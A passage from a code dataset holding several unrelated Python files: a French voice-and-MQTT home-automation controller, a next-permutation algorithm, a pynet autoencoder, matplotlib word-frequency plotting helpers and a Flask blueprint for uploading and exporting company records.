d'alarme\",\n \"éteindre le système d'alarme\",\n \"arreter le système d'alarme\",\n \"désarmer le système d'alarme\"}:\n publicate(channel_gpio,\"alarme_OFF\")\n 
mong.push(\"alarme\",\"DISARMED\")\n compute(\"désactivation systeme d'alarme\")\n print(\"sys_vox alarm off\")\n \n elif modele in {\"allumer le système d'alarme\",\n \"ouvrir le système d'alarme\",\n \"ouvre le système d'alarme\",\n \"démarrer le système d'alarme\",\n \"armer le système d'alarme\"}:\n publicate(channel_gpio,\"alarme_ON\")\n mong.push(\"alarme\",\"ARMED\")\n compute(\"activation systeme d'alarme\")\n print(\"sys_vox alarm on\")\n else:\n print(\"cant associate model\")\n else:\n no_compute()\n print(\"score<90\")\n except:\n no_compute()\n print(\"cant extract model\")\n\n# fonction de recuperation et vocalisation du temps\ndef clockwork():\n time = datetime.datetime.now()\n time = time.strftime(\"%H:%M\")\n h,m = time.split(\":\")\n tts.say(f\"il est {h} heures {m} minutes\")\n print(f\"il est {h} heures {m} minutes\")\n\n# fonction de recuperation et vocalisation de la meteo\ndef meteo_vox():\n txtMeteo = \"la Temperature est de \" + str(meteo.temperature('celsius')['temp']) + \"celsiusse et le temps est \" + meteo.detailed_status\n print(txtMeteo)\n tts.say(txtMeteo)\n \n# fonction de vocalisation d'un message \ndef compute(msg):\n tts.say(msg)\n print(msg)\n \n# fonction de vocalisation d'un message d'erreur \ndef no_compute():\n tts.say(u\"la commande n'est pas clair, pouvez vous répété\")\n print(\"la commande n'est pas clair, pouvez vous répété\")\n\n\n\n\n#SYSTEME MQTT\n# fonction de recuperation et d'association de message publier sur mqtt\ndef on_message(client, userdata, message):\n print(\"on_msg received message: \" ,str(message.payload.decode(\"utf-8\")))\n \n event=str(message.payload.decode(\"utf-8\"))\n global etat_lum1\n global etat_lum2 \n global etat_alarm\n global etat_porte\n # reception et declenchement des pin du gpio par le systeme GUI ou VOX \n if \"lumiere1_ON\" in event:\n print(\"mqtt_onmsg_checked lumiere1 on!\") \n GPIO.output(pin_lum1, GPIO.HIGH)\n elif \"lumiere1_OFF\" in event:\n print(\"mqtt_onmsg_checked lumiere1 off!\") \n GPIO.output(pin_lum1, GPIO.LOW) \n elif \"lumiere2_ON\" in event:\n print(\"mqtt_onmsg_checked lumiere 2 on!\") \n GPIO.output(pin_lum2, GPIO.HIGH)\n elif \"lumiere2_OFF\" in event:\n print(\"mqtt_onmsg_checked lumiere 2 off!\") \n GPIO.output(pin_lum2, GPIO.LOW)\n elif \"alarme_ON\" in event:\n print(\"mqtt_onmsg_checked alarme on!\") \n GPIO.output(pin_alarm, GPIO.HIGH)\n elif \"alarme_OFF\" in event:\n print(\"mqtt_onmsg_checked alarme off!\") \n GPIO.output(pin_alarm, GPIO.LOW)\n elif \"porte_ON\" in event:\n print(\"mqtt_onmsg_checked porte on!\") \n GPIO.output(pin_porte, GPIO.HIGH)\n elif \"porte_OFF\" in event:\n print(\"mqtt_onmsg_checked porte off!\") \n GPIO.output(pin_porte, GPIO.LOW)\n \n # reception et declenchement de l'affichage declencher par gpio\n elif \"lumière d'entrer on\"in event:\n etat_lum1 = \"ON\"\n l1_etat.config(text= etat_lum1, fg = \"green\")\n print(\"mqtt_onmsg_checked pin_lum1-on\")\n elif \"lumière d'entrer off\"in event:\n etat_lum1 = \"OFF\"\n l1_etat.config(text= etat_lum1, fg = \"red\")\n print(\"mqtt_onmsg_checked pin_lum1-off\")\n elif \"lumière du salon on\"in event:\n etat_lum2 = \"ON\"\n l2_etat.config(text= etat_lum2, fg = \"green\")\n print(\"mqtt_onmsg_checked pin_lum2-on\")\n elif \"lumière du salon off\"in event:\n etat_lum2 = \"OFF\"\n l2_etat.config(text= etat_lum2, fg = \"red\")\n print(\"mqtt_onmsg_checked pin_lum2-off\")\n elif \"alarme on\"in event:\n etat_alarm = \"ARMED\"\n l3_etat.config(text= etat_alarm, fg = \"red\")\n print(\"mqtt_onmsg_checked 
pin_alarm-on\")\n elif \"alarme off\"in event:\n etat_alarm = \"DISARMED\"\n l3_etat.config(text= etat_alarm, fg = \"green\")\n print(\"mqtt_onmsg_checked pin_alarm-off\")\n elif \"porte on\"in event:\n etat_porte = \"OPEN\"\n porte_etat.config(text= etat_porte)\n print(\"mqtt_onmsg_checked porte on\")\n elif \"porte off\"in event:\n etat_porte = \"CLOSE\"\n porte_etat.config(text= etat_porte)\n print(\"mqtt_onmsg_checked porte off\")\n \n\n# fonction de publication de message sur mqtt\ndef publicate(channel, msg):\n client.publish(channel, msg)\n print(f\"publicate: {msg} on {channel}\")\n\n# fonction d'ecoute et de publication du gpio sur mqtt \ndef gpio_listen(pin, channel, msg):\n msg_original = msg\n print(f\"gpio_listen {pin} start\")\n while running:\n gpio_read_1 = GPIO.input(pin)\n sleep(0.2)\n gpio_read_2 = GPIO.input(pin)\n if gpio_read_1 != gpio_read_2:\n print(f\"gpio_listen {pin} read change\")\n if GPIO.input(pin):\n print(\"gpio_on\")\n msgvox = f\"{msg}, ouverte\"\n msg = str(msg+\" on\")\n publicate(channel, msg)\n sleep(1.4)\n tts.say(msgvox)\n if not GPIO.input(pin):\n print(\"gpio_OFF\")\n msgvox = f\"{msg}, fermer\"\n msg = str(msg+\" off\")\n publicate(channel, msg)\n sleep(1.4)\n tts.say(msgvox)\n msg = msg_original\n #print(etat_lum1) \n print(f\"gpio_listen {pin} out\")\n\n\n\n\n#SYSTEME GUI \n# fonction de commande associer au bouton commande vocale\ndef commande_vocal():\n listening()\n analyze()\n\n# fonction de commande associer au bouton lumiere1 on\ndef lumiere1_ON():\n mong.push(\"lumiere1\", \"ON\")\n publicate(channel_gpio, \"lumiere1_ON\")\n compute(\"allumage lumière de l'entrer\")\n\n# fonction de commande associer au bouton lumiere1 off\ndef lumiere1_OFF():\n mong.push(\"lumiere1\",\"OFF\")\n publicate(channel_gpio, \"lumiere1_OFF\")\n compute(\"fermeture lumière de l'entrer\")\n\n# fonction de commande associer au bouton lumiere2 on\ndef lumiere2_ON():\n mong.push(\"lumiere2\", \"ON\")\n publicate(channel_gpio, \"lumiere2_ON\")\n compute(\"allumage lumière du salon\")\n\n\n# fonction de commande associer au bouton lumiere2 off\ndef lumiere2_OFF():\n mong.push(\"lumiere2\",\"OFF\")\n publicate(channel_gpio, \"lumiere2_OFF\")\n compute(\"fermeture lumière du salon\")\n\n# fonction de commande associer au bouton alarme armed\ndef alarme_ON():\n mong.push(\"alarme\",\"ARMED\")\n publicate(channel_gpio, \"alarme_ON\")\n compute(\"activation système d'alarme\")\n\n# fonction de commande associer au bouton alarme disarmed\ndef alarme_OFF():\n mong.push(\"alarme\",\"DISARMED\")\n publicate(channel_gpio, \"alarme_OFF\")\n compute(\"désactivation système d'alarme\")\n \n# fonction de commande associer au bouton porte open \ndef porte_ON():\n publicate(channel_gpio, \"porte_ON\")\n mong.push(\"porte\", \"OUVERTURE\")\n compute(\"ouverture porte\")\n \n# fonction de commande associer au bouton porte close \ndef porte_OFF():\n mong.push(\"porte\", \"FERMETURE\")\n publicate(channel_gpio, \"porte_OFF\")\n compute(\"fermeture porte\")\n\n# fonction de commande associer au bouton historique et affichage du log mongodb\ndef historique():\n global resultat\n global f1\n f1 = Tk()\n f1.title(\"Historique\")\n f1.geometry(\"400x450\")\n\n resultat = Text(f1)\n resultat.config(width=60, height=23)\n resultat.insert(INSERT, \"\")\n resultat.grid(row=2, column=0, columnspan=4)\n\n bouton = Button(f1, text=\"Quitter\", command=f1.destroy)\n bouton.grid(row=10, column=2)\n \n bouton1 = Button(f1, text=\"Actualiser\", command=actualiser)\n bouton1.grid(row=10, column=0)\n 
resultat.insert(INSERT, mong.retrieve(20))\n    \n    f1.mainloop()\n\n# command callback for the refresh button of the history window;\n# refreshes the mongodb log view \ndef actualiser():\n    resultat.delete(\"1.0\",\"end\")\n    resultat.insert(INSERT, mong.retrieve(20))\n\n# command callback for the quit button and for closing (x) the window\ndef destroy():\n    global running\n    print(\"Quitter proprement\")\n    running = False\n    client.loop_stop()\n    client.disconnect()\n    f.destroy()\n    try:\n        f1.destroy()\n    except:\n        pass\n\n# config block for the clock display function \ndef clockTime():\n    now = datetime.datetime.now()\n    t = now.strftime(\" %A %-d %B \\n %H:%M:%S\")\n    affiche_heure.config(text = t)\n    affiche_heure.after(1000, clockTime)\n\n# config block for the weather display function \ndef getMeteo():\n    global txtMeteo\n    imageMeteo = f\"http://openweathermap.org/img/wn/{meteo.weather_icon_name}.png\"\n    response = requests.get(imageMeteo)\n    file = open(\"meteo_image.png\", \"wb\")\n    file.write(response.content)\n    file.close()\n    img = ImageTk.PhotoImage(IMG.open(\"meteo_image.png\"))\n    affiche_image.configure(image=img)\n    affiche_image.image = img\n    txtMeteo = \"Temperature: \" + str(meteo.temperature('celsius')['temp']) + \" celsius\" + \"\\n\" + meteo.detailed_status\n    affiche_meteo.config(text = txtMeteo)\n    affiche_meteo.after(5000, getMeteo) \n    return txtMeteo\n\n\n\n# start the mqtt protocol loop\nclient.loop_start()\n\nclient.subscribe(channel_gpio)\nclient.on_message=on_message\n\n# activation du des thread parallele pour l= 1 and digits[end_index] <= digits[end_index - 1]:\n        end_index -= 1\n    if end_index != 0:\n        found_index = end_index - 1\n        for j in range(len(digits)-1,found_index,-1):\n            if digits[j] > digits[found_index]:\n                digits[found_index] , digits[j] = digits[j], digits[found_index]\n                break\n\n    else:\n        return 'Next number not possible'\n\n    # digits are ints, so stringify them before joining\n    return ''.join(str(d) for d in reverse(digits, end_index))\n\n\ndef reverse(number,index):\n    start = index\n    end = len(number) - 1\n    while start < end:\n        number[start], number[end] = number[end], number[start]\n        start += 1\n        end -= 1\n    return number\n\n\nprint(find_next_greatest(1993))\n\n\n\n\n","repo_name":"dhruvarora93/Algorithm-Questions","sub_path":"Array Problems/find_next_greatest.py","file_name":"find_next_greatest.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"}
{"seq_id":"31697719794","text":"
layer\nfrom pynet.model import *\nfrom pynet.layer import *\nimport pynet.datasets.i2r as i2r\nimport pynet.learning_method as learning_methods\nfrom pynet.learning_rule import LearningRule\nfrom pynet.log import Log\nfrom pynet.train_object import TrainObject\nfrom pynet.cost import Cost\nimport pynet.datasets.preprocessor as preproc\nimport pynet.layer_noise as layer_noise\n\nimport cPickle\nimport os\n\nimport numpy as np\n\nfrom hps.models.model import AE\n\nimport theano\nfrom theano.sandbox.cuda.var import CudaNdarraySharedVariable\nfloatX = theano.config.floatX\n\n\nclass I2R_AE(AE):\n\n def __init__(self, state):\n self.state = state\n\n def run(self):\n dataset = self.build_dataset()\n # import pdb\n # pdb.set_trace()\n learning_rule = self.build_learning_rule()\n model = self.build_model(dataset)\n learn_method = self.build_learning_method()\n database = self.build_database(dataset, learning_rule, learn_method, model)\n log = self.build_log(database)\n train_obj = TrainObject(log = log,\n dataset = dataset,\n learning_rule = learning_rule,\n learning_method = learn_method,\n model = model)\n train_obj.run()\n # log.info(\"fine tuning\")\n # for layer in train_obj.model.layers:\n # layer.dropout_below = None\n # layer.noise = None\n # train_obj.setup()\n # train_obj.run()\n\n\n\n\n\n\n\n def build_layer(self, dataset, layer_name):\n\n output_noise = None if layer_name.layer_noise.type is None else \\\n getattr(layer_noise, layer_name.layer_noise.type)()\n if layer_name.layer_noise.type in ['BlackOut', 'MaskOut', 'BatchOut']:\n output_noise.ratio = layer_name.layer_noise.ratio\n\n elif layer_name.layer_noise.type == 'Gaussian':\n output_noise.std = layer_name.layer_noise.std\n output_noise.mean = layer_name.layer_noise.mean\n\n output = getattr(layer, layer_name.type)(dim=layer_name.dim,\n name=layer_name.name,\n dropout_below=layer_name.dropout_below,\n noise=output_noise)\n return output\n\n def build_database(self, dataset, learning_rule, learning_method, model):\n database = super(I2R_AE, self).build_database(dataset, learning_rule, learning_method, model)\n if self.state.dataset.dataset_noise.type == 'Gaussian':\n database['records']['dataset_noise_std'] = dataset.noise.std\n X_max = np.argmax(dataset.get_test().X, axis=1).astype(floatX)\n y_max = np.argmax(dataset.get_test().y, axis=1).astype(floatX)\n\n mean_error = np.mean(y_max != X_max)\n database['records']['Noisy_Test_Error_Rate'] = mean_error\n return database\n\n\n\n def build_model(self, dataset):\n model = MLP(input_dim=dataset.feature_size(), rand_seed=self.state.model.rand_seed)\n hidden1 = self.build_layer(dataset, self.state.hidden1)\n hidden2 = self.build_layer(dataset, self.state.hidden2)\n output = self.build_layer(dataset, self.state.output)\n # model.add_layer(hidden1)\n # model.add_layer(hidden2)\n model.add_layer(output)\n return model\n","repo_name":"hycis/Pynet","sub_path":"hps/models/I2R_AE.py","file_name":"I2R_AE.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"95"} +{"seq_id":"74271352953","text":"from datetime import datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport itertools\n\n\n# set font\nplt.rcParams['font.family'] = 'sans-serif'\nplt.rcParams['font.sans-serif'] = 'Helvetica'\n\n# set the style of the axes and the text 
color\nplt.rcParams['axes.edgecolor']='#333F4B'\nplt.rcParams['axes.linewidth']=0.8\nplt.rcParams['xtick.color']='#333F4B'\nplt.rcParams['ytick.color']='#333F4B'\nplt.rcParams['text.color']='#333F4B'\n\n\ndef plot_word_counter(word_counter, top_n=100, save_fig=False):\n frequencies = [f for (w, f) in word_counter.most_common(top_n)]\n words = [w for (w, f) in word_counter.most_common(top_n)]\n words_idx = [i for i, (w, f) in enumerate(word_counter.most_common(top_n))]\n\n \n fig, ax = plt.subplots(figsize=(20, 8))\n\n # plt.vlines(x=words_idx, ymin=0, ymax=frequencies, color='#9E3D61', alpha=0.2, linewidth=15) # 007ACC\n # plt.plot(words_idx, frequencies, \"s\", markersize=15, color='#970137', alpha=0.6) # 007ACC \n ax.bar(words_idx, frequencies, alpha=0.8, color='#970137', linewidth=15)\n\n\n # set labels\n ax.set_ylabel('Fréquence d\'apparition du mot', fontsize=15, \n fontweight='black', color='#333F4B')\n ax.set_xlabel('')\n ax.set_title('')\n\n # set axis\n plt.xticks([])\n\n # plt.xticks(words_idx, words)\n # ax.tick_params(axis='both', which='major', labelsize=12)\n # plt.xticks(rotation=70, ha='center')\n\n # change the style of the axis spines\n ax.spines['top'].set_color('none')\n ax.spines['right'].set_color('none')\n\n # set the spines position\n ax.spines['left'].set_position(('axes', 0.015))\n plt.yscale('log')\n \n # Add labels at the top of the bar\n for idx, f, w in zip(words_idx, frequencies, words):\n\n label = \"{}\".format(w) \n plt.annotate(label, # this is the text\n (idx, f), # this is the point to label\n textcoords=\"offset points\", # how to position the text\n xytext=(0,20), # distance from text to points (x,y)\n ha='center', # horizontal alignment can be left, right or center\n rotation=90, \n fontsize=15, \n weight='bold') \n \n label = \"{:.0f}\".format(f) \n plt.annotate(label, (idx, f), textcoords=\"offset points\", \n xytext=(1, -40 - len(label)), ha='center',\n rotation=90, fontsize=15, weight='bold', color='white') \n \n if save_fig:\n now = datetime.now()\n time_stamp = now.strftime(\"%d_%m_%Y__%H_%M_%S\")\n plt.savefig('./counter_{}.png'.format(time_stamp), dpi=300, bbox_inches='tight')\n \n plt.show();\n \n \ndef plot_zipf(counter, save_fig=False):\n frequencies = [f for (w, f) in counter.most_common(len(counter))]\n words = [w for (w, f) in counter.most_common(len(counter))]\n words_idx = [i for i, (w, f) in enumerate(counter.most_common(len(counter)))]\n\n fig, ax = plt.subplots(figsize=(10, 10))\n \n # Add labels word examples\n log_range = [int(f) for f in np.logspace(0, 4, 10)] \n log_range[-1] = -100\n for i in log_range:\n\n label = \"{}\".format(words[i]) \n plt.annotate(label, (words_idx[i], frequencies[i]), \n textcoords=\"offset points\", xytext=(20,20), \n ha='center', rotation=0, fontsize=15, fontweight='black') \n\n ax.set_xlabel('Rang des mots', fontsize=15)\n ax.set_ylabel('Fréquence d\'apparition des mots', fontsize=15)\n\n plt.plot(words_idx, frequencies, \"o\", markersize=5, color='#970137', alpha=0.3)\n plt.yscale('log')\n plt.xscale('log')\n ax.grid(True)\n \n if save_fig:\n now = datetime.now()\n time_stamp = now.strftime(\"%d_%m_%Y__%H_%M_%S\")\n plt.savefig('./zipf_{}.png'.format(time_stamp), dpi=300, bbox_inches='tight')\n \n plt.show();\n\n\n# Confusion matrix\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n 
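# note: with normalize=True each row of cm is divided by its row sum, so the diagonal shows per-class recall\n 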
plt.figure(figsize=(5, 5))\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n # print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n plt.show();\n","repo_name":"AntoineSimoulin/m2-data-sciences","sub_path":"src/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"95"} +{"seq_id":"72554907831","text":"from flask import Blueprint, render_template, jsonify, redirect, request\nfrom flask import send_from_directory\n\nimport sys\nfrom openpyxl import Workbook\n\nsys.path.append(\"..\")\nfrom db import db\nfrom .models.companyInfo import *\nfrom .export import export\nfrom .update import update\nfrom user.models.userInfo import *\nfrom .models.fileInfo import *\n\nimport os\nimport _thread\nimport datetime, uuid\n\nfrom flask import make_response\n\nimport json\n\ncompany = Blueprint('company', __name__)\n\nALLOWED_EXTENSIONS = set(['txt', 'png', 'jpg', 'xls', 'xlsx', 'JPG', 'PNG', 'gif', 'GIF', 'doc', 'docx'])\n\n\n# used to check the file extension\ndef allowe_file(filename):\n '''\n restrict the file formats allowed for upload\n :param filename:\n :return:\n '''\n return '.' 
in filename and filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n\ndef change_filename(filename):\n '''\n rename the uploaded file\n :param filename:\n :return:\n '''\n fileinfo = os.path.splitext(filename)\n filename = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\") + str(uuid.uuid1().hex) + fileinfo[-1]\n return filename\n\n\n@company.route('/home')\ndef index():\n return render_template('company/home.html')\n\n\n@company.route('/show', methods=['GET', 'POST'])\ndef show():\n # print(request.get_data())\n # print(\"###################\")\n a = request.get_data() # get the byte stream sent by JavaScript\n # print(type(a)) # bytes\n s1 = str(a, encoding='utf-8') # decode to string\n # print(type(s1))\n # print(s1)\n dict1 = json.loads(s1) # turn the string into a dict\n\n # data = json.loads(request.get_data('data'))\n pageNum = dict1['pagenum']\n companyName = dict1['companyName']\n storeName = dict1['storeName']\n bianhao = dict1['bianhao']\n belongTo = dict1['belongTo']\n startTime = dict1['startTime']\n endTime = dict1['endTime']\n\n userId = \"\"\n if belongTo != None and belongTo != \"\":\n userInfo = UserInfo.query.filter(UserInfo.realname.like(\"%\" + belongTo + \"%\")).first()\n userId = userInfo.id\n\n print(\"===================userId:{}\".format(userId))\n\n # print(page)\n # paginated query: e.g. 3 per page, fetching page 2\n pn = CompanyInfo.query.filter(\n CompanyInfo.companyName.like(\"%\" + companyName + \"%\") if companyName is not None and companyName != \"\" else str(\n \"\"),\n CompanyInfo.storeName.like(\"%\" + storeName + \"%\") if storeName is not None and storeName != \"\" else str(\"\"),\n CompanyInfo.customBianHao.like(\"%\" + bianhao + \"%\") if bianhao is not None and bianhao != \"\" else str(\"\"),\n CompanyInfo.belongTo == userId if userId is not None and userId != \"\" else \"\",\n CompanyInfo.updatetime.between(startTime,\n endTime) if startTime is not None and startTime != \"\" and endTime is not None and endTime != \"\" else str(\n \"\"),\n CompanyInfo.updatetime > startTime if startTime is not None and startTime != \"\" and (\n endTime is None or endTime == \"\") else \"\"\n ).order_by(CompanyInfo.id.desc()).paginate(page=pageNum, per_page=50)\n # pn.items\n # # the data of this page\n # pn.page\n # # the current page number\n # pn.pages\n # the total number of pages\n dict = {}\n\n dict[\"errCode\"] = 200\n dict[\"errMessage\"] = \"请刷新页面重新试一次\"\n\n cis = CompanyInfoScheme(many=True)\n result = cis.dump(pn.items)\n dict[\"info\"] = result\n dict[\"totalNumberPage\"] = pn.pages\n return jsonify(dict)\n\n@company.route('/fileshow', methods=['GET', 'POST'])\ndef fileShow():\n\n a = request.get_data() # get the byte stream sent by JavaScript\n\n s1 = str(a, encoding='utf-8') # decode to string\n\n dict1 = json.loads(s1) # turn the string into a dict\n\n # data = json.loads(request.get_data('data'))\n pageNum = dict1['pagenum']\n searchName = dict1['searchName']\n belongTo = dict1['belongTo']\n startTime = dict1['startTime']\n endTime = dict1['endTime']\n\n userId = \"\"\n if belongTo != None and belongTo != \"\":\n userInfo = UserInfo.query.filter(UserInfo.realname.like(\"%\" + belongTo + \"%\")).first()\n userId = userInfo.id\n\n print(\"===================userId:{}\".format(userId))\n\n # print(page)\n # paginated query: e.g. 3 per page, fetching page 2\n pn = FileInfo.query.filter(\n FileInfo.name.like(\"%\" + searchName + \"%\") if searchName is not None and searchName != \"\" else str(\"\"),\n FileInfo.belongTo == userId if userId is not None and userId != \"\" else \"\",\n FileInfo.updatetime.between(startTime,\n endTime) if startTime is not None and startTime != \"\" and endTime is not None and endTime != \"\" else str(\n \"\"),\n 
FileInfo.updatetime > startTime if startTime is not None and startTime != \"\" and (\n endTime is None or endTime == \"\") else \"\"\n ).order_by(FileInfo.id.desc()).paginate(page=pageNum, per_page=20)\n # pn.items\n # # the data of this page\n # pn.page\n # # the current page number\n # pn.pages\n # the total number of pages\n dict = {}\n\n dict[\"errCode\"] = 200\n dict[\"errMessage\"] = \"请刷新页面重新试一次\"\n\n cis = FileInfoScheme(many=True)\n # print(\"===================cis:{}\".format(len(pn.items)))\n result = cis.dump(pn.items)\n dict[\"info\"] = result\n dict[\"totalNumberPage\"] = pn.pages\n return jsonify(dict)\n\n\n\n@company.route('/getComById', methods=['GET', 'POST'])\ndef getComById():\n a = request.get_data() # get the byte stream sent by JavaScript\n\n s1 = str(a, encoding='utf-8') # decode to string\n\n dict1 = json.loads(s1) # turn the string into a dict\n idn = int(dict1['id'])\n # print(type(idn))\n # print(idn)\n cif = CompanyInfo.query.filter_by(id=idn).first()\n\n # summary_schema = UserSchema(only=('name', 'email'))\n # summary_schema.dump(user).data\n # {\"name\": \"Monty Python\", \"email\": \"monty@python.org\"}\n\n cis = CompanyInfoScheme()\n result = cis.dump(cif)\n return jsonify(result)\n\n\n@company.route('/download', methods=['GET', 'POST'])\ndef download():\n print(\"在下载函数里执行了\")\n\n id = request.form.get('id')\n fileInformation = FileInfo.query.filter(FileInfo.id == id).first()\n name=fileInformation.quchongFile\n\n # return jsonify({\"描述\":\"出错了\"})\n target_path = \"upload\"\n FilePath = os.path.join(target_path, name)\n if(os.path.exists(FilePath)):\n return send_from_directory(target_path, name, as_attachment=True)\n else:\n return jsonify([\"您下载的文件不存在,已经被删除了!\"])\n # file_name = \"工作簿1.xlsx\"\n # response = make_response(send_from_directory(target_path, \"工作簿1.xlsx\", as_attachment=True))\n # response.headers[\"Content-Disposition\"] = \"attachment; filename={}\".format(file_name)\n # return response\n\n\n@company.route('/uploadhtml', methods=['GET', 'POST'])\ndef uploadHtml():\n return render_template('upload/upload.html')\n\n\ndef saveCompany(companyListNotInDB, target_path, realfilename):\n # create a workbook\n wb = Workbook()\n\n # create a worksheet (note: it is a property) # activate worksheet\n table = wb.active\n\n # excel names a new worksheet sheet1 by default; the line below gives the new worksheet its own name\n table.title = 'Sheet1'\n\n i = 0\n for rowele in companyListNotInDB:\n i = i + 1\n j = 0\n for ele in rowele:\n j = j + 1\n table.cell(row=i, column=j, value=ele)\n\n # date\n now_time = datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S')\n haveRead = \"读取了\";\n excelName = \"{}-{}-{}-{}条.xlsx\".format(realfilename, now_time, haveRead, len(companyListNotInDB))\n # FilePath = target_path + \"/\" + excelName\n FilePath = os.path.join(target_path, excelName)\n if (delFile(FilePath)):\n wb.save(FilePath)\n print(\"保存文件成功:{},数据条数:{}\".format(FilePath, len(companyListNotInDB)))\n return {\"flag\": True, \"path\": excelName}\n\ndef delFile(file):\n\n try:\n # check whether the file exists\n if (os.path.exists(file)):\n os.remove(file)\n # print('移除文件:%s' % file)\n # else:\n # print(\"无相同文件不用删除!\")\n return True\n except Exception as e:\n print('文件{}删除错误,可能文件被打开了,请关闭重试!'.format(file))\n return False\n\n@company.route('/reupdate', methods=['GET', 'POST'])\ndef reupdate():\n\n a = request.get_data() # get the byte stream sent by JavaScript\n\n s1 = str(a, encoding='utf-8') # decode to string\n\n dict1 = json.loads(s1) # turn the string into a dict\n idn = int(dict1['id'])\n\n fileInformation = FileInfo.query.filter(FileInfo.id == idn).first()\n name = fileInformation.changeName\n realfilename = fileInformation.name\n lineNumber = fileInformation.lineNumber\n start = 2\n if 
lineNumber != None and lineNumber != \"\" and lineNumber != \"null\":\n start = lineNumber\n\n end = -1\n savePath = \"upload\"\n sheetName = \"\"\n isUseNewUser = 1\n isquchong = 1\n # reUpdateCompany(idn, start, end, savePath, name, sheetName, isUseNewUser, isquchong, realfilename)\n _thread.start_new_thread(reUpdateCompany, (idn, start, end, savePath, name, sheetName, isUseNewUser, isquchong, realfilename))\n\n return jsonify({\"flag\":1})\n\n\ndef reUpdateCompany(insertId,start,end,savePath,filename,sheetName,isUseNewUser,isquchong,realfilename):\n\n filePath = os.path.join(savePath, filename)\n if sheetName == \"\":\n sheetName = \"Sheet1\"\n resultUpdate = update(insertId,filePath, sheetName, start, end, isUseNewUser, isquchong)\n\n companyListNotInDB = resultUpdate[\"companyListNotInDB\"]\n resultSave = saveCompany(companyListNotInDB, savePath, realfilename)\n if resultSave[\"flag\"]:\n quchongFileName = resultSave[\"path\"]\n now_time = datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S')\n # the save succeeded, update the file record\n fileInformation = FileInfo.query.filter(FileInfo.id == insertId).first()\n fileInformation.status = 1 # set to 1\n fileInformation.quchongFile = quchongFileName\n fileInformation.updatetime = now_time\n\n db.session.commit()\n\n\n@company.route('/upload', methods=['GET', 'POST'])\ndef upload():\n # print(\"在这里执行了\")\n file = request.files.get('fileName') # get the file\n\n realfilename = file.filename # get the file name\n filename = change_filename(realfilename)\n # print(\"fileName:{}\".format(filename))\n savePath = \"upload\"\n file.save(os.path.join(savePath, filename)) # save the file, then record it in the database\n now_time = datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S')\n fileInformation = FileInfo(1, realfilename, filename, \"\", 0,0,0,now_time, now_time)\n db.session.add(fileInformation)\n db.session.flush()\n # get the primary key of the newly inserted row\n insertId = fileInformation.id\n db.session.commit()\n\n\n # start = 2\n # end = -1\n # filePath = os.path.join(savePath, filename)\n # # print(filePath)\n # sheetName = \"\"\n # if sheetName == \"\":\n # sheetName = \"Sheet1\"\n # isUseNewUser = 1\n # isquchong = 1\n # resultUpdate = update(filePath, sheetName, start, end, isUseNewUser, isquchong)\n #\n # companyListNotInDB = resultUpdate[\"companyListNotInDB\"]\n # resultSave = saveCompany(companyListNotInDB, savePath, realfilename)\n #\n # quchongFileName = resultSave[\"path\"]\n # now_time = datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S')\n # #the save succeeded, update the file record\n # fileInformation = FileInfo.query.filter(FileInfo.id==insertId).first()\n # fileInformation.status=1 #set to 1\n # fileInformation.quchongFile=quchongFileName\n # fileInformation.updatetime = now_time\n #\n # db.session.commit()\n start = 2\n end = -1\n savePath = \"upload\"\n sheetName = \"\"\n isUseNewUser = 1\n isquchong = 1\n # reUpdateCompany(insertId, start, end, savePath, filename, sheetName, isUseNewUser, isquchong, realfilename)\n _thread.start_new_thread(reUpdateCompany,(insertId, start, end, savePath, filename, sheetName, isUseNewUser, isquchong, realfilename))\n\n return redirect('/p/uploadhtml')\n # return render_template('upload/upload.html')\n # return jsonify({\"id\":1})\n\n\n@company.route('/exporthtml', methods=['GET', 'POST'])\ndef exportHtml():\n return render_template('export/export.html')\n\n\n@company.route('/export', methods=['GET', 'POST'])\ndef exportCompany():\n target_path = \"generateForDownload\"\n # return send_from_directory(target_path, \"2个完整-----测试.xlsx\", as_attachment=True)\n\n companyName = request.form.get('companyName')\n storeName = 
request.form.get('storeName')\n belongTo = request.form.get('belongTo')\n bianhao = request.form.get('bianhao')\n shengfen = request.form.get('shengfen')\n city = request.form.get('city')\n countNumber = request.form.get('countNumber', type=int)\n canbaorenshu = request.form.get('canbaorenshu')\n isHaveCang = request.form.get('isHaveCang', type=int)\n startNumber = request.form.get('startNumber', type=int)\n endNumber = request.form.get('endNumber', type=int)\n yingxiaocount = request.form.get('yingxiaocount')\n startTime = request.form.get('startTime')\n endTime = request.form.get('endTime')\n isFromFileNumber = request.form.get('isFromFileNumber', type=int)\n\n userId = \"\"\n if belongTo != None and belongTo != \"\":\n userInfo = UserInfo.query.filter(UserInfo.realname.like(\"%\" + belongTo + \"%\")).first()\n userId = userInfo.id\n\n resultExport = export(companyName, storeName, userId, bianhao, shengfen, city, \\\n countNumber, canbaorenshu, isHaveCang, startNumber, \\\n endNumber, yingxiaocount, startTime, endTime, 